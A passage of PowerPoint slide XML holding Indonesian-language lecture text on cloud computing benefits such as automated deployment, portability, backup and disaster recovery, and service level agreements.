              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intervensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> manual dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>orkestrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>templat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstandardisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyederhanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Portabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadwalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghapusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpindah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> wilayah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>SLA dan ISA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SLA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
